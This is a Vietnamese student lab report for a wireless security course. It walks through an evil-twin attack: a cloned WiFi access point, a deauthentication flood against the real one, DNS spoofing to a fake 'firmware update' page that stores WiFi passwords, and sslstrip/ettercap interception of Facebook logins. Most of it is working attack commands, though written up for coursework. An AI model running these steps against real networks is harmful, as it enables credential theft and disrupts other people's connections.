Tải bản đầy đủ (.docx) (11 trang)

An toàn mạng không dây và di động: FAKE ACCESS POINT SNIFFER PASSWORD

Bạn đang xem bản rút gọn của tài liệu. Xem và tải ngay bản đầy đủ của tài liệu tại đây (733.33 KB, 11 trang )

Báo cáo Lab 5
Sinh viên 1: 14520541 – Đỗ Bá Tứ Mỹ
Sinh viên 2: 14520842 – Nguyễn Hoàng Thanh

BÁO CÁO LAB 5
FAKE ACCESS POINT SNIFFER PASSWORD
Môn học An toàn mạng không dây và di động
GVHD: Lê Đức Thịnh
Sinh viên 1: 14520541 – Đỗ Bá Tứ Mỹ
Sinh viên 2: 14520842 – Nguyễn Hoàng Thanh

Trang 1 / 11


Báo cáo Lab 5
Sinh viên 1: 14520541 – Đỗ Bá Tứ Mỹ
Sinh viên 2: 14520842 – Nguyễn Hoàng Thanh

I. LẤY MẬT KHẨU AP GỐC:
1. Cài đặt isc-dhcp-server:
Cài đặt:
apt-get update
apt-get install isc-dhcp-server

Cấu hình:
Mở tập tin: nano /etc/dhcp/dhcpd.conf
authoritative;
default-lease-time 600;
max-lease-time 7200;
subnet 192.168.1.0 netmask 255.255.255.0
{


option subnet-mask 255.255.255.0;
option broadcast-address 192.168.1.255;
option routers 192.168.1.1;
option domain-name-servers 192.168.10.1; # tùy vào từng máy
range 192.168.1.1 192.168.1.100;
}

2. Giải quyết xung đột giữa airmon-ng và Network Manager:
Trang 2 / 11


Báo cáo Lab 5
Sinh viên 1: 14520541 – Đỗ Bá Tứ Mỹ
Sinh viên 2: 14520842 – Nguyễn Hoàng Thanh

Gõ lệnh: nano /etc/NetworkManager/NetworkManager.conf
Thêm vào sau tập tin:
[keyfile]
unmanaged-devices=interface-name:wlan0mon;interface-name:wlan1mon;interfacename:wlan2mon;interface-name:wlan3mon;interface-name:wlan4mon;interfacename:wlan5mon;interface-name:wlan6mon;interface-name:wlan7mon;interfacename:wlan8mon;interface-name:wlan9mon;interface-name:wlan10mon;interfacename:wlan11mon;interface-name:wlan12mon

Lưu và thoát.

3. Chuyển card wifi về chế độ giám sát:
Gõ lệnh: airmon-ng start wlan0

Gõ lệnh: airodump-ng wlan0mon để tiến hành lắng nghe các kết nối không đây. Tìm
kiếm thông tin về mục tiêu.

Trang 3 / 11



Báo cáo Lab 5
Sinh viên 1: 14520541 – Đỗ Bá Tứ Mỹ
Sinh viên 2: 14520842 – Nguyễn Hoàng Thanh

Ghi chép lại thông tin mục tiêu:
 BSSID: C8:3A:35:2E:AE:F8
 CH: 7
 ESSID: GauGau

4. Tạo AP giả:
Dùng lệnh: airbase-ng -e "GauGau"-c 7 wlan0mon để tạo một AP giả không cần mật
khẩu.

Lúc này AP giả sẽ tạo ra interface at0 để bắt cầu hoặc định tuyến tới AP giả mạo.
Gán IP và định tuyến mạng lớp 192.168.1.0/24 thông qua interface at0 mới tạo ra.

5. Thiết lập NAT bằng cách thiết đặt luật cho tường lửa IPTABLES:
Gõ những lệnh sau:
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT
Bật chế độ chuyển tiếp lưu lượng mạng

Trang 4 / 11


Báo cáo Lab 5
Sinh viên 1: 14520541 – Đỗ Bá Tứ Mỹ
Sinh viên 2: 14520842 – Nguyễn Hoàng Thanh


echo 1 > /proc/sys/net/ipv4/ip_forward

6. Khởi động các dịch vụ:
Chúng ta sẽ khởi động các dịch vụ isc-dhcp-server, apache2, mysql.
Gõ các lệnh sau:
systemctl start isc-dhcp-server
systemctl start apache2
systemctl start mysql

7. Tạo giao diện web và cơ sở dữ liệu:
Tải tập tin rogue_AP.zip từ về máy.
Tập tin này chứa giao diện web, khi nạn nhân kết nối vào AP giả mạo, khi mở trình
duyệt web sẽ bị chuyển hướng đến trang web này yêu cầu nhập mật khẩu wifi để cập
nhật firmware.
Mặc định thư mục chứa mã trang web trên kali là /var/www/html. Ta sẽ giải nén tập tin
trên vào thư mục này.
Gõ lệnh: unzip rogue_AP.zip -d /var/www/html/

Ta thấy có tập tin dbconnect.php, trong tập tin này chứa mã nguồn kết nối đến mysql
server nơi lưu mật khẩu khi nạn nhân nhập vào.
Cấu hình cơ sở dữ liệu này.

Trang 5 / 11


Báo cáo Lab 5
Sinh viên 1: 14520541 – Đỗ Bá Tứ Mỹ
Sinh viên 2: 14520842 – Nguyễn Hoàng Thanh

Gõ lệnh: mysql -u root –p (mặc định mật khẩu trống)

Chúng ta sẽ thêm người dùng tên là “fakeap” với mật khẩu “fakeap”.
Gõ lệnh: create user fakeap@localhost identified by 'fakeap';

Thêm cơ sở dữ liệu:
Gõ lệnh:
create database rogue_AP;
use rogue_AP;
create table wpa_keys(password1 varchar(32), password2 varchar(32));
Nó trông như sau:

Cấp quyền truy cập vào cơ sở dữ liệu ‘rogue_AP’ cho người dùng ‘fakeap’.
Gõ lệnh: grant all privileges on rogue_AP.* to 'fakeap'@'localhost';

Kiểm tra:
Gõ lệnh: mysql -u fakeap –p (mật khẩu fakeap)
Gõ lệnh:
use rogue_AP; chuyển cơ sở dữ liệu.
insert into wpa_keys(password1, password2) values ("testpass", "testpass");
chèn dữ liệu để kiểm thử
select * from wpa_keys; in ra dữ liệu vừa nhập
Ta được kết quả:

Trang 6 / 11


Báo cáo Lab 5
Sinh viên 1: 14520541 – Đỗ Bá Tứ Mỹ
Sinh viên 2: 14520842 – Nguyễn Hoàng Thanh

Với kết quả tương tự như trên thì việc tạo cơ sở dữ liệu đã thành công.


8. Tấn công AP mục tiêu và đợi nạn nhân:
Gõ lệnh: aireplay-ng --deauth 0 -a C8:3A:35:2E:AE:F8 wlan0mon
Với C8:3A:35:2E:AE:F8 là BSSID thu thập ở mục 3.
--deauth 0 gởi liên tục gói de-authentication đến AP mục tiêu ngắt mọi máy khách
(client) đang kết nối ra và bắt buộc họ kết nối vào AP giả mà chúng ta tạo ra.

Sau một khoảng thời gian, nạn nhân nhận ra là AP gốc không thể kết nối, nhưng có AP
giống tên AP gốc ở đây là ‘GauGau’, họ sẽ kết nối vào AP giả mạo này.

Trang 7 / 11


Báo cáo Lab 5
Sinh viên 1: 14520541 – Đỗ Bá Tứ Mỹ
Sinh viên 2: 14520842 – Nguyễn Hoàng Thanh

Bây giờ nạn nhân đã truy cập vào AP giả mạo. Chúng ta sẽ chuyển hướng nạn nhân đến
trang web giả mạo đã dựng ở mục 7 để lấy mật khẩu wifi của AP gốc.
Gõ lệnh: dnsspoof -i at0
Lệnh trên sẽ phân giải mọi tên miền về IP: 192.168.1.1. Tức là nạn nhân sẽ bị chuyển về
web giả mạo.

Trang 8 / 11


Báo cáo Lab 5
Sinh viên 1: 14520541 – Đỗ Bá Tứ Mỹ
Sinh viên 2: 14520842 – Nguyễn Hoàng Thanh


Sau khi nạn nhân nhập mật khẩu, trang web sẽ chuyển hướng vờ như là đang cập nhật
firmware.

Khi đó trong cơ sở dữ liệu đã có mật khẩu của AP gốc.

II. TẤN CÔNG MAN IN THE MIDDLE:
Mô hình:

Trang 9 / 11


Báo cáo Lab 5
Sinh viên 1: 14520541 – Đỗ Bá Tứ Mỹ
Sinh viên 2: 14520842 – Nguyễn Hoàng Thanh

Trên Kali:
Thêm luật sau vào iptables:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port
10000
luật này chuyển hướng mọi kết nối http đến cổng 10000.
Gõ lệnh: sslstrip -p –k –l 10000
Ý nghĩa lệnh trên là dùng sslstrip để chuyển giao thức https -> http và ghi log phương
thức POST của giao thức http với cổng lắng nghe là 10000.
Gõ lệnh: ettercap -p -u -T -q -i at0
Dùng ettercap để lắng nghe kết nối đến card mạng at0 lấy thông tin
Trên Win 7:
Người dùng kết nối đến AP giả mạo và mở trình duyệt web vào facebook.com đăng
nhập.

Trang 10 / 11



Báo cáo Lab 5
Sinh viên 1: 14520541 – Đỗ Bá Tứ Mỹ
Sinh viên 2: 14520842 – Nguyễn Hoàng Thanh

Kết quả là ta bắt được thông tin đăng nhập.

--------HẾT--------

Trang 11 / 11



×